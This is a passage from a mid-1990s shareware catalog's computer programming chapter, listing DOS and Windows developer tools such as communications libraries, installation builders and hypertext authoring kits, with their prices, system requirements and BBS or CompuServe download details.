driven, RTS/CTS flow control. + Supports Borland C, Turbo C, Microsoft C, MIX Power C, and + Quick C. Includes a terminal program with ASCII, XMODEM, + YMODEM, and YMODEM-G. + + + Product: Personal Protocol Lib for C/C++ + Author: , 205-881-4630 + Version: 1.0 (02-12-95) + Needs: IBM PC, DOS 2.0 or better. Program can run safely on a + system with no hard disk and only one floppy disk drive. + Personal Communications Library for C/C++ (PCL4C). + Strongly recommended: Hayes-compatible modem. + Registration fee: $40.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $6.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of unlimited phone, fax, BBS, mail + support; royalty-free source code; bonus utilities; all ASP- + wide offers (see page 5); disks of other shareware. + Look for: PPL4C10.ZIP on BBSs (call 205-880-9748 to download it + at no charge); PPLC10.ZIP on CompuServe in CIS:PCPRO forum + LIBrary 3 (or contact userID 70671,1340 for assistance); + PPL4C10.ZIP on GEnie in IBMPC forum LIBrary 4. + PsL#: 11782 + Download size: 83k (about six minutes with a 2400 baud modem) + Description: + A protocol library supporting ASCII, XMODEM, YMODEM, and ZMODEM + protocols. Supports most C compilers incluidng Turbo C, Borland + C, Microsoft C, and MIX Power C. + + Chapter 12, "Computer programming" 419 + + + + Product: The Window BOSS & Data Clerk + Author: , 203-574-2449 + Version: 8.02 (08-15-94) + Needs: IBM PC, DOS 2.1 or better. CGA monitor; Hercules monitor; + Hard disk. "C" Compiler (Microsoft, Borland, Watcom). + Strongly recommended: Mouse; CD-ROM drive. + Registration fee: $55.00 (add $6.00 for shipping to U.S. + addresses) (add $8.00 for shipping to Canadian addresses) (add + $8.00 for shipping outside U.S. or Canada) + Registration benefits: 31/2" master disk(s); lifetime unlimited + phone, CompuServe, GEnie support; royalty-free source code; + royalty-free runtime license; discounts on upgrades. 2-month + free upgrading allowed. + Look for: BOZZ.ZIP on BBSs (multiple files); BOSS.ZIP on + CompuServe in CIS:PCPROG forum LIBrary 3 (multiple files) (or + contact userID 71565,1001 for assistance); BOSS.ZIP on GEnie in + IBMPC forum LIBrary 9 (multiple files) (or contact userID + MONGELLUZZO for assistance). + SWREG#: 3667 + PsL#: 10171 + Download size: 500k (about 37 minutes with a 2400 baud modem) + Awards & nominations: 1993 finalist, Shareware Industry Awards. + Description: + Comprehensive set of windowing, data entry, and mouse + manipulation functions for the "C" language. Pop-up windows, + pull down menus, CUA(s), status lines, and the like can be + easily implemented. Makes it a snap to enter text, integers, + floats, longs, dates, phone numbers, and times. Complex forms + with individual field validation checks, help and error + messages are a snap. The programmer interface is clean, + uncluttered, and easy to remember. Generated code is fast and + small! + + + 12.4.3.1 C++ + + Product: EZinst + Windows installation. See full description on page 427. + + Product: Playground + Tool for building object models. See full description on + page 399. + + Product: Technical Editor (Windows NT) + Programmers/text editor. See full description on page 189. + + Chapter 12, "Computer programming" 420 + + + + Product: Wndlib + Author: , 312-922-6313 + Version: 1.0 (03-25-94) + Needs: IBM 80386, Windows 3.1 or better. 2048k RAM; EGA monitor; + Hard disk. + Registration fee: $22.00 (add $1.00 for shipping to Canadian + addresses) (add $3.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, BBS, CompuServe, mail + support; royalty-free source code; bonus data; all ASP-wide + offers (see page 5); discounts on other products; discounts on + upgrades. Lifetime free upgrading allowed. + Look for: WNDLIB10.ZIP on BBSs (call 312-922-2839 to download it + at no charge); WNDLI*.ZIP on CompuServe in CIS:BCPPWIN forum + LIBrary 10 (or contact userID 71532,3271 for assistance). + Download size: 81k (about six minutes with a 2400 baud modem) + Description: + A set of C++ class libraries to aid Windows programming. + + + 12.4.4 COBOL + + Product: PROGRAM ENTITY ORGANIZER + Author: , 916-756-4976 + Version: 1.2 (02-01-94) + Needs: IBM 80386, DOS 5.0 or better. EGA monitor; Hard disk. + Strongly recommended: VGA monitor; XMS memory. + Registration fee: $119.00 (add $3.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $7.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of CompuServe, mail support; 3-month + limited return policy; all ASP-wide offers (see page 5). + Lifetime free upgrading allowed. + Look for: PEO.ZIP on BBSs; PEO.ZIP on CompuServe in CIS:PCPROG + forum LIBrary 5 (or contact userID 73323,2105 for assistance). + Download size: 380k (about 28 minutes with a 2400 baud modem) + Description: + Guides the user through the myriad data and logic paths, in all + directions; has editor to document data transformations, + control logic, business functions; retraces data/logic paths; + includes subprograms automatically; relates element to actions + of group; supports REPLACING, RENAMES, alternate entries, + redefinitions, qualification; identifies parm/arg aliases; + combines programs, prints call hierarchy; has data name filter. + No limit on program size. Proven on the job for two years! + + Chapter 12, "Computer programming" 421 + + + + 12.4.5 Pascal + + Product: LZW Data Compression for Pascal + Author: , 205-881-4630 + Version: 1.4 (06-01-94) + Needs: IBM PC, DOS 2.0 or better. Program can run safely on a + system with no hard disk and only one floppy disk drive. + Strongly recommended: Hard disk. + Registration fee: $45.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $6.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of unlimited phone, fax, BBS, + newsletter, mail support; royalty-free source code; all ASP- + wide offers (see page 5); disks of other shareware. + Look for: LZW4P14.ZIP on BBSs (call 205-880-9748 to download it + at no charge); LZWP14.ZIP on CompuServe in CIS:PCPROG forum + LIBrary 5 (or contact userID 70671,1340 for assistance); + LZW4P14.ZIP on GEnie in IBMPC forum LIBrary 4. + PsL#: 10911 + Download size: 29k (about two minutes with a 2400 baud modem) + Description: + A data compression library for Turbo Pascal programmers which + is based on the LZW algorithm as published in research papers + by Lempel, Ziv, and Welch. The LZW algorith is probably the + best generic compression algorithm known today. Includes + example programs to compress and expand a file, make a + compressed file archive and a LZW test driver. + + + Product: Personal Com Lib for PowerBASIS + Author: , 205-881-4630 + Version: 4.2 (09-01-94) + Needs: IBM PC, DOS 2.0 or better. Program can run safely on a + system with no hard disk and only one floppy disk drive. + Strongly recommended: Hard disk; Hayes-compatible modem. + Registration fee: $65.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $6.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of unlimited phone, fax, BBS, + newsletter, mail support; source code; royalty-free runtime + license; bonus utilities; all ASP-wide offers (see page 5). + Look for: PCL4PB42.ZIP on BBSs (call 205-881-9748 to download it + at no charge); PCL4PB.ZIP on CompuServe in CIS:PCPROG forum + LIBrary 4; PCL4PB42.ZIP on GEnie in IBMPC forum LIBrary 4. + PsL#: 11499 + Download size: 50k (about four minutes with a 2400 baud modem) + Description: + An asynchronous communications library supporting PoerBASIC. + Supports COM1 to COM16, 300 to 115200 baud, 4 ports + concurrently, complete line/modem status & control, interrupt + driven, 8250/16450/16550, RTS/CTS flow control, Digiboard PC/4 + + Chapter 12, "Computer programming" 422 + + + + & PC/8, and BOCA BB2016. Includes terminal program with XMODEM + & YMODEM. + + + Product: Personal Comm Lib for BASIC + Author: , 205-881-4630 + Version: 4.2 (09-01-94) + Needs: IBM PC, DOS 2.0 or better. Program can run safely on a + system with no hard disk and only one floppy disk drive. + Strongly recommended: Hard disk; Hayes-compatible modem. + Registration fee: $65.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $6.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of unlimited phone, fax, BBS, + newsletter, mail support; source code; royalty-free runtime + license; bonus utilities; all ASP-wide offers (see page 5); + disks of other shareware. + Look for: PCL4B42.ZIP on BBSs (call 205-880-9748 to download it + at no charge); PCLB42.ZIP on CompuServe in CIS:PCPROG forum + LIBrary 4; PCL4B42.ZIP on GEnie in IBMPC forum LIBrary 4. + PsL#: 11499 + Download size: 50k (about four minutes with a 2400 baud modem) + Description: + An asynchronous communications library supporting Microsoft + Visual BASIC fdor DOS. Supports COM1 - COM16 at 300 to 115200 + baud, 4 ports concurrently, complete line/modem status & + control, interrupt driven, 8250,16450/16550 UARTS, RTS/CTS flow + control, Digiboad PC/4 & PC/8, BOCA BB2016. Includes terminal + program with XMODEM and YMODEM. + + + Product: Personal Comm Lib for Pascal + Author: , 205-881-4630 + Version: 4.2 (09-01-94) + Needs: IBM PC, DOS 2.0 or better. Program can run safely on a + system with no hard disk and only one floppy disk drive. + Strongly recommended: Hard disk; Hayes-compatible modem. + Registration fee: $65.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $6.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of unlimited phone, fax, BBS, + newsletter, mail support; royalty-free source code; bonus + + Chapter 12, "Computer programming" 423 + + + + utilities; all ASP-wide offers (see page 5); disks of other + shareware. + Look for: PCL4P42.ZIP on BBSs (call 205-880-9748 to download it + at no charge); PCLP42.ZIP on CompuServe in CIS:PCPRO forum + LIBrary 5 (or contact userID 70671,1340 for assistance); + PCL4P42.ZIP on GEnie in IBMPC forum LIBrary 4. + PsL#: 10909 + Download size: 65k (about five minutes with a 2400 baud modem) + Description: + An asynchronous communications library supporting Turbo Pascal + version 4.0 and up. Supports COM1-COM16, 300 to 115200 baud, 4 + ports concurrently, complete line/modem status & control, + interrupt driven, 8250/16450/16550 UARTs, RTS/CTS flow control, + DigiBoard PC/4 & PC/8, and dumb BOCA boards. Includes terminal + program with ASCII, XMODEM, YMODEM, YMODEM-G. + + + Product: Personal Protocol Lib 4 Pascal + Author: , 205-881-4630 + Version: 1.0 (02-12-95) + Needs: IBM PC, DOS 2.0 or better. Program can run safely on a + system with no hard disk and only one floppy disk drive. + Personal Communications Library for Pascal (PCL4P). + Strongly recommended: Hayes-compatible modem. + Registration fee: $40.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $6.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of unlimited phone, fax, BBS, + newsletter, mail support; royalty-free source code; bonus + utilities; all ASP-wide offers (see page 5); disks of other + shareware. + Look for: PPL4P10.ZIP on BBSs (call 205-880-9748 to download it + at no charge); PPLP10.ZIP on CompuServe in CIS:PCPRO forum + LIBrary 5 (or contact userID 70671,1340 for assistance); + PPL4P10.ZIP on GEnie in IBMPC forum LIBrary 4. + PsL#: 11783 + Download size: 80k (about six minutes with a 2400 baud modem) + Description: + A protocol library featuring ASCII, XMODEM, YMODEM, and ZMODEM + protocols. Supports Borland Turbo Pascal 4.0 and up. + + + 12.4.5.1 OOP Pascal for DOS (Borland) + + Product: TURBO TPU TOOLKIT! + Pascal math function toolkit. See full description on + page 439. + + 12.4.6 Other + + Product: Ahelp Clipper Help Library + Advanced help library for Clipper developers. See full + description on page 437. + + Chapter 12, "Computer programming" 424 + + + + Product: EXTENDED BATCH LANGUAGE-PLUS! + The real batch language you wish DOS had. See full description + on page 102. + + Product: PowerBatch + Batch file replacement creates compiled pgms. See full + description on page 106. + + Product: RexxBase + The dBase Database For Rexx. See full description on page 400. + + Product: Simply Help! + Create hypertext documents - EXE/TSR/QB/PDS. See full + description on page 424. + + + 12.5 Hypertext/hypermedia + + See also: Business, Training & support aids. + + Product: DeskTop Advisor(R) + Author: , 610-328-1145 + Version: 2.0 (12-04-93) + Needs: IBM PC, DOS 2.1 or better. 7k RAM; CGA monitor; Hercules + monitor; Hard disk. Browser (launched via hot key) needs 512k + RAM minimum. + Strongly recommended: VGA monitor; EMS memory; XMS memory. + Registration fee: $59.00 (add $4.00 for shipping to U.S. + addresses) (add $6.00 for shipping to Canadian addresses) (add + $8.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; quick-reference card; + choice of 31/2" or 51/4" master disk(s); 3 months of unlimited + phone, fax, CompuServe, mail support; 3-month return policy; + royalty-free runtime license; bonus utilities; bonus data; all + ASP-wide offers (see page 5). 1 free update disk(s) sent out. + Bonus Sound Support(tm) to enhance online help. + Look for: DTA20*.ZIP on BBSs (multiple files) (call 215-673-6915 + to download it at no charge); DTA20*.ZIP on CompuServe in + CIS:MULTIMEDIA forum LIBrary 11 (multiple files) (or contact + userID 71221,3602 for assistance). + SWREG#: 2832 + PsL#: 11407 + Download size: 678k (about 51 minutes with a 2400 baud modem) + Description: + A hyperdocument authoring & delivery system. It is an easy-to- + use tool for creating and distributing on-line documents in + hypertext form. These hyperdocuments can be electronically + browsed for learning, research, reference, or instant help + purposes. Attach images and sound (e.g., voice annotation). + Three navigational modes are supported: menu selection, keyword + query, and hyperlink. Has a TSR shell for popping up over + other applications when needed. + + Chapter 12, "Computer programming" 425 + + + + Product: Simply Help! + Author: + Version: 1.06 (04-08-92) + Needs: IBM PC, DOS 3.1 or better. 512k RAM. 384k, Hard drive + recommended. + Strongly recommended: Hard disk; Mouse. + Registration fee: $35.00 (add $5.00 for shipping outside U.S. or + Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of unlimited phone, fax, BBS, mail support; royalty-free + runtime license; + Look for: SIMHLP1C.ZIP on BBSs (call 709-489-6018 to download it + at no charge). + Download size: 353k (about 26 minutes with a 2400 baud modem) + Description: + Integrated environment to create text based hypertext documents + and help systems. Documents are based on a series of one or + more screens linked together by links. Includes editor, + compiler, EXE/TSR viewers and libraries for QB 4.xx and PDS 7.1 + editor has pull down menus, dialog boxes, mouse support, on- + line help, block operations, line drawing, import/export, + reports, much more. Create TSR help for existing programs, + catalogs, readme files, manuals, on-line help for BASIC progs, + BBS help systems + + + Product: WebParse + Mailto web form data parsing and conversion. See full + description on page 375. + + Product: WebPen + Author: , 610.640.0339 + Version: 1.00 (09-05-95) + Needs: IBM PC, Windows 3.0 or better. VBRUN300.DLL. + Registration fee: $19.00 (add $3.50 for shipping to U.S. + addresses) (add $3.50 for shipping to Canadian addresses) (add + $3.50 for shipping outside U.S. or Canada) + Registration benefits: printed manual; 31/2" master disk(s); + lifetime unlimited phone, CompuServe support; 3-month return + policy; all ASP-wide offers (see page 5); discounts on other + products; discounts on upgrades. 12-month free upgrading + allowed. + Look for: availability unknown on BBSs; WEBPEN.ZIP on CompuServe + in CIS:INTERNET R forum LIBrary 9 (or contact userID 76534,1166 + for assistance). + SWREG#: 7147 + Download size: 70k (about five minutes with a 2400 baud modem) + Description: + This easy to use HTML editor simplifies the creation of 'every + day' home pages. Special functions for colored bullets, e- + mail, copyright, etc. + + Chapter 12, "Computer programming" 426 + + + + 12.6 Tutorials + + See also: Education, Computers. + + Product: Basic Training + Author: , 206-523-6135 + Version: 1.01 (10-07-92) + Needs: IBM PC, DOS 2.1 or better. + Registration fee: $20.00 (add $4.00 for shipping to U.S. + addresses) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of unlimited CompuServe, mail support; bonus utilities; + disks of other shareware; discounts on other products. Bonus + source code. + Look for: availability unknown on BBSs; BT.ZIP on CompuServe in + CIS:PCPROG forum LIBrary 4 (or contact userID 76703,3046 for + assistance). + SWREG#: 380 + Download size: 150k (about eleven minutes with a 2400 baud modem) + Description: + This tutorial introduces the elements of BASIC including simple + controls, looping, color & sound, arrays & DATA, GOSUBs and + functions, files, simple graphics. Interactive tutorial comes + complete with numerous examples you can run and modify. When + you've mastered this, you're ready for advanced BASIC. Topics + include animation techniques, shape shifting techniques, error + handling, chaining, windows, peek/poke, bload/bsave, plus, + details on diff + + + Product: The DemoMaker + Author: , 212-334-1243 + Version: 1.55 (04-02-94) + Needs: IBM PC, DOS 2.0 or better. 512k RAM; Hard disk. + Strongly recommended: CGA monitor. + Registration fee: $20.00 + Registration benefits: lifetime unlimited phone, fax, BBS, mail + support; site license; all ASP-wide offers (see page 5); disks + of other shareware. Lifetime free upgrading allowed. + Look for: DMAKE155.ZIP on BBSs (call 718-716-6198 to download it + at no charge). + Download size: 155k (about twelve minutes with a 2400 baud modem) + Description: + A powerful software tool that creates presentation demos of any + DOS based program. It allows software authors to create live + color demonstrations of their products, to show the various + capabilities of their programs, in the form of compact self + running presentations. Sysops can use it to create slide shows + of their systems to graphically demonstrate all the features + their BBS has to offer. Very easy to use and creates compact + EXE files. + + Chapter 12, "Computer programming" 427 + + + + 12.7 Software installation aids + + Product: CzarInstall for DOS + Author: , 915-595-8787 + Version: 1.02 (04-20-95) + Needs: IBM PC, DOS 3.0 or better. 320k RAM. + Registration fee: $29.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: 31/2" master disk(s); lifetime unlimited + phone, fax, BBS, CompuServe, mail support; royalty-free runtime + license; site license; all ASP-wide offers (see page 5); + discounts on other products; discounts on upgrades. + Look for: CZINS102.ZIP on BBSs (call 915-595-8705 to download it + at no charge); CZINS1.ZIP on CompuServe in CIS:BASIC forum + LIBrary 10 (or contact userID 71031,3614 for assistance). + SWREG#: 4416 + PsL#: 11780 + Download size: 520k (about 39 minutes with a 2400 baud modem) + Description: + Fully mouse driven, professional install program for software + developers. Built-in ZIP compression, split files, create + commercial distribution disks or shareware distribution + packages with a touch of a button, change envir. variables, + master- disk creator, SAA/GUI 3-d Interface, ANSI wallpapers + during install without using ANSI.SYS. + + + Product: Easy Install + Author: , 01625-614669 + Version: 4.4 (06-15-95) + Needs: IBM PC, DOS 5.0 or better. 512k RAM; Hard disk. + Registration fee: $40.00 + Registration benefits: 31/2" master disk(s); 3 months of unlimited + CompuServe, mail support; all ASP-wide offers (see page 5). + Look for: availability unknown on BBSs; EI.ZIP on CompuServe in + CIS:PCPROG forum LIBrary 6 (or contact userID 100410,717 for + assistance). + SWREG#: 3045 + PsL#: 11491 + Download size: 211k (about 16 minutes with a 2400 baud modem) + Description: + At the touch of a key, it will create self installing + distribution disks in compressed form. There is no need to + create separate packed files for different disk sizes - just + tell it which directory your program is in and which drive to + create the Installation disk(s) on. Your program will be packed + onto however many disks are necessary. The end user simply + types "Install" on disk one. Also transfers a customizeable + Readme.Bat file to Disk One. + + Chapter 12, "Computer programming" 428 + + + + Product: EZinst + Author: , 312-922-6313 + Version: 1.2 (07-28-94) + Needs: IBM AT (80286), Windows 3.1 or better. 1024k RAM; Program + can run safely on a system with no hard disk and only one + floppy disk drive; EGA monitor. + Strongly recommended: VGA monitor; Hard disk. + Registration fee: $22.00 (add $1.00 for shipping to Canadian + addresses) (add $3.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, BBS, CompuServe, mail + support; royalty-free source code; bonus utilities; discounts + on other products; discounts on upgrades. Lifetime free + upgrading allowed. + Look for: EZINST12.ZIP on BBSs (call 312-922-2839 to download it + at no charge); EZINS*.ZIP on CompuServe in CIS:BCPPWIN forum + LIBrary 9 (or contact userID 71532,3271 for assistance). + SWREG#: 3782 + Download size: 54k (about four minutes with a 2400 baud modem) + Description: + An installation program for Windows. It was designed for + programmers, consultants, and other users who need a program to + easily install Windows applications. On-line help. + + + Product: First Impression + Author: , 314-861-1500 + Version: 3.1 (06-09-95) + Needs: IBM PC, DOS 3.1 or better. 512k RAM. + Registration fee: $75.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; 31/2" master disk(s); lifetime unlimited phone, fax, BBS, + CompuServe, mail support; bonus utilities; all ASP-wide offers + (see page 5); discounts on upgrades. + Look for: IMPRES31.ZIP on BBSs (call 317-784-2147 to download it + at no charge); IMPRES.ZIP on CompuServe in CIS:CLIPPER forum + LIBrary 0 (or contact userID 70700,630 for assistance). + PsL#: 10931 + Download size: 300k (about 23 minutes with a 2400 baud modem) + Description: + Scriptless installation toolkit for developers that covers + every aspect of an install. Full featured WYSIWYG developer + interface allows you to create that exact look you need without + writing a script! Check for h/w requirements as well as + updates CONFIG and AUTOEXEC files. Auto search will search a + drive for prev. installations and conditional checking allows + necessary actions to be performed if needed. Many hardware + verification options! + + Chapter 12, "Computer programming" 429 + + + + Product: Inspect & Install for Windows + Author: + Version: 1.10 (02-26-94) + Needs: IBM AT (80286), Windows 3.1 or better. + Registration fee: $29.00 + Registration benefits: Full program functionality; quick- + reference card; 31/2" master disk(s); 3 months of fax, + CompuServe, mail support; royalty-free source code; all ASP- + wide offers (see page 5); discounts on upgrades. + Look for: availability unknown on BBSs; IINST*.ZIP on CompuServe + in CIS:UKSHARE forum LIBrary 0 (or contact userID 100120,2335 + for assistance). + SWREG#: 2126 + Download size: 200k (about 15 minutes with a 2400 baud modem) + Description: + Inspect & install includes utilities to inspect version + information and to install single program files on Windows/ + Windows NT, or to install complete groups of files based on a + simple script. This setup utility allows you to create Program + Manager groups together with installation directories. + + + Product: PUT, GET, Install Utilities + Compression, archive, installation aids. See full description + on page 42. + + Product: QUIK-INSTALL + Author: , 919-552-0767 + Version: 2.0 (12-07-93) + Needs: IBM PC, DOS 2.1 or better. 184k RAM. + Registration fee: $15.00 + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of unlimited phone, CompuServe, mail + support; royalty-free runtime license; all ASP-wide offers (see + page 5); disks of other shareware. + Look for: availability unknown on BBSs; QINST2.ZIP on CompuServe + in CIS:PCPROG forum LIBrary 6 (or contact userID 73307,3547 for + assistance). + Download size: 130k (about ten minutes with a 2400 baud modem) + Description: + Create a fully functional, self contained, application install + program in less than 5 minutes! Menu driven setup (No scripts, + CFG's or programing) with mouse support & context sensitive + help. Supports multiple disks, creates directories, copies + files or unpacks EXE archives, checks disk space, executes + application after installation, 6.5k INSTALL.EXE stores setup + information internally, configure colors, prompt, messages, + adds functionality to batch files, very quick & very easy! + + + Product: Rosenthal UnInstall + Remove unwanted DOS & Windows prog. safely. See full + description on page 36. + + Chapter 12, "Computer programming" 430 + + + + Product: SETUP.EXE - Free 19k Bootstrap + Author: , (44)-0-973-222937 + Version: 4.6 (08-12-95) + Needs: IBM AT (80286), Windows 3.0 or better. Windows + development system such as Visual Basic or Delphi. + Registration fee: $10.00 + Registration benefits: lifetime unlimited fax, CompuServe, mail + support; lifetime return policy; royalty-free source code; all + ASP-wide offers (see page 5). Lifetime free upgrading allowed. + Look for: availability unknown on BBSs; ASETUP.ZIP on CompuServe + in CIS:MSBASIC forum LIBrary 9 (or contact userID 100030,351 + for assistance). + SWREG#: 5171 + PsL#: 14067 + Download size: 100k (about eight minutes with a 2400 baud modem) + Description: + Free 18k bootstrapper program. Features include full dialog box + customisation and enhanced error messages (optional 3d look), + Windows file version checking, setup log, optional temporary + directory use, ability to localise all text, and more - over 22 + configuration settings! Originally for Visual Basic (as an + advanced alternative to the SETUP.EXE supplied with that + product) but can be used with any Windows development system. + Includes Windows help. + + + Product: Universal Install + Author: , 303-444-5747 + Version: 2.0 (05-10-94) + Needs: IBM PC, DOS 3.0 or better. 250k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Strongly recommended: CGA monitor; Hard disk. + Registration fee: $39.95 (add $2.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; quick-reference card; 31/2" master disk(s); 12 months of + unlimited phone, fax, BBS, CompuServe, mail support; 1-month + return policy; royalty-free runtime license; bonus utilities; + all ASP-wide offers (see page 5); discounts on other products; + discounts on upgrades. 1 free update disk(s) sent out. + Look for: UNST20.ZIP on BBSs (call 303-XXX-XXXX to download it at + no charge); UNST20.ZIP on CompuServe in CIS:PCPROG forum + LIBrary 3 (or contact userID 72073,225 for assistance). + SWREG#: 907 + PsL#: 11020 + Download size: 165k (about twelve minutes with a 2400 baud modem) + Description: + A professional software installation development kit featuring + built-in file compression (save up to 50% space), a text file + view feature with print and search functions, self-contained + INSTALL.EXE generation, features to make modifications to any + file (even WIN.INI) and create batch files to run your + + Chapter 12, "Computer programming" 431 + + + + software. The end result can look and feel like your own + software - you have complete control over all aspects of your + installation. + + + Product: Vending Machine + Author: , 314-861-1500 + Version: 1.5 (06-17-95) + Needs: IBM PC, DOS 3.1 or better. + Registration fee: $50.00 + Registration benefits: 3 months of unlimited mail support; all + ASP-wide offers (see page 5). + Look for: VEND15.ZIP on BBSs (call 317-784-2147 to download it at + no charge); VEND15.ZIP on CompuServe in CIS:0 forum LIBrary 0 + (or contact userID 70700,630 for assistance). + Download size: 60k (about five minutes with a 2400 baud modem) + Description: + Custome installation toolkit for disk vendors that will allow + users to uncompress up to 10 files per disk into a user defined + subdirecotry. Allows for configuration encryption and file + viewing for each ZIP. + + + Product: WINstall + Author: , 801-221-4527 + Version: 1.0a (11-01-94) + Needs: IBM AT (80286), Windows 3.1 or better. Program can run + safely on a system with no hard disk and only one floppy disk + drive; EGA monitor. + Strongly recommended: VGA monitor; Hard disk; Mouse; XMS + memory. + Registration fee: $39.95 (add $3.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $6.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; quick- + reference card; choice of 31/2" or 51/4" master disk(s); 12 months + of unlimited phone, CompuServe, mail support; 3-month return + policy; royalty-free runtime license; all ASP-wide offers (see + page 5); discounts on other products; discounts on upgrades. + 3-month free upgrading allowed. + Look for: WINS10A.ZIP on BBSs (call 801-224-4031 to download it + at no charge); WINS.ZIP on CompuServe in CIS:WINSHARE forum + LIBrary 22 (or contact userID 74552,1027 for assistance). + SWREG#: 3512 + PsL#: 11587 + Download size: 34k (about three minutes with a 2400 baud modem) + Description: + A professional Windows installation utility that provides + software publishers with an easy to use, compact tool with + which they may set up their software on users' computers. Fully + automated and supports installation from multiple floppies of + any size or directly from a hard drive or CD-ROM. At only 25k + this is the smallest program of its type for the power and + + Chapter 12, "Computer programming" 432 + + + + flexability that it offers. Don't sacrifice disk space for a + quality install. + + + 12.8 Software testing aids + + Product: c-scope + Easy to use C program static analysis tool. See full + description on page 433. + + Product: Clickometer + Warns when keybd/mouse activity exceed limits. See full + description on page 127. + + Product: RI-VB Database Toolkit v1.1 + Author: , 404-594-7500 + Version: 1.1 (02-15-95) + Needs: IBM 80386, Windows 3.1 or better. 4000k RAM; Hard disk; + XMS memory; VBRUN300.DLL. + Registration fee: $30.00 (add $3.95 for shipping to U.S. + addresses) (add $7.95 for shipping to Canadian addresses) (add + $7.95 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; choice of 31/2" or 51/4" master disk(s); 3 months of + unlimited phone, fax, CompuServe, mail support; 3-month limited + return policy; site license; all ASP-wide offers (see page 5); + discounts on upgrades. + Look for: RIDT11.ZIP on BBSs; RIDT11.ZIP on CompuServe in + CIS:MSBASIC forum LIBrary 17 (or contact userID 75350,205 for + assistance). + SWREG#: 4783 + Download size: 684k (about 51 minutes with a 2400 baud modem) + Description: + For use in the development of Visual Basic and MS Access + database applications. A means for executing single/multiple + SQL statements on Access database; adding, modifying, running, + exporting and importing query defs listings; generating SQL + create and insert statements from an existing Access database. + Output directed to screen, text file, printer or the clipboard. + Fully functional with online help. This revised version + replaces RIDT10.ZIP and allows spaces in Database or field + names. + + + Product: Rosenthal UnInstall + Remove unwanted DOS & Windows prog. safely. See full + description on page 36. + + Product: Teleshare/DOS Remote Access + Basic DOS remote control. See full description on page 392. + + Product: Virus Simulator + Safely audit & demonstrate virus protection. See full + description on page 169. + + Chapter 12, "Computer programming" 433 + + + + 12.9 Programming utilities + + Product: BASASM.LIB + Assembler routine library for BASIC programs. See full + description on page 403. + + Product: c-scope + Author: , 416-751-5678 + Version: 1.11 (10-31-93) + Needs: IBM PC, DOS 2.11 or better. 512k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor. + Registration fee: $24.00 (add $5.00 for shipping outside U.S. or + Canada) + Registration benefits: Full program functionality; printed + manual; choice of 31/2" or 51/4" master disk(s); lifetime unlimited + phone, mail support; royalty-free runtime license; all ASP-wide + offers (see page 5). + Look for: CSCOP111.ZIP on BBSs (call 519-940-0007 to download it + at no charge). + Download size: 46k (about four minutes with a 2400 baud modem) + Description: + Completely analyzes the interrelationships between functions in + a C program no matter how complex it is--even when many source + files are involved. It produces a Function Location report + showing the file each function is defined in; a File Contents + report naming the functions defined in each file; a Function + Reference report listing the functions each function calls; and + a Static Calling Tree report giving a visual representation of + the function calls. + + + Product: CALC_JNC + The ultimate TSR programmers calculator. See full description + on page 122. + + Product: CODE-A-LINE + Outline processor, text editor, printing util. See full + description on page 192. + + Product: The DemoMaker + Creates demos/slide shows for any DOS program. See full + description on page 426. + + Product: File Finder/Grouper + The best file finder! Find & process files. See full + description on page 30. + + Product: LPRINT + Formats & prints files for PS w/ borders, etc. See full + description on page 93. + + Chapter 12, "Computer programming" 434 + + + + Product: OWShare - Delphi + Shareware interface source code demo - Delphi. See full + description on page 641. + + Product: OWShare - VB + Shareware interface source code demo - VB. See full + description on page 641. + + Product: Rosenthal WinLite + Shrink MS-Windows programs by compression. See full + description on page 43. + + Product: Simply Docs + Converts ASCII files to EXEs. TSR/print opts. See full + description on page 57. + + Product: Simply Help! + Create hypertext documents - EXE/TSR/QB/PDS. See full + description on page 424. + + Product: Universal Install + Software installation development kit. See full description on + page 430. + + Product: Workbase + Dot-prompt utility for DBMS programmers. See full description + on page 250. + + 12.9.1 Desktop tools for programmers + + See also: Business, Training & support aids, "Help desk" + applications. + + Product: BOOT.SYS + The heavy-duty configuration manager. See full description on + page 106. + + Product: BOXER/DOS Text Editor + Full-featured text 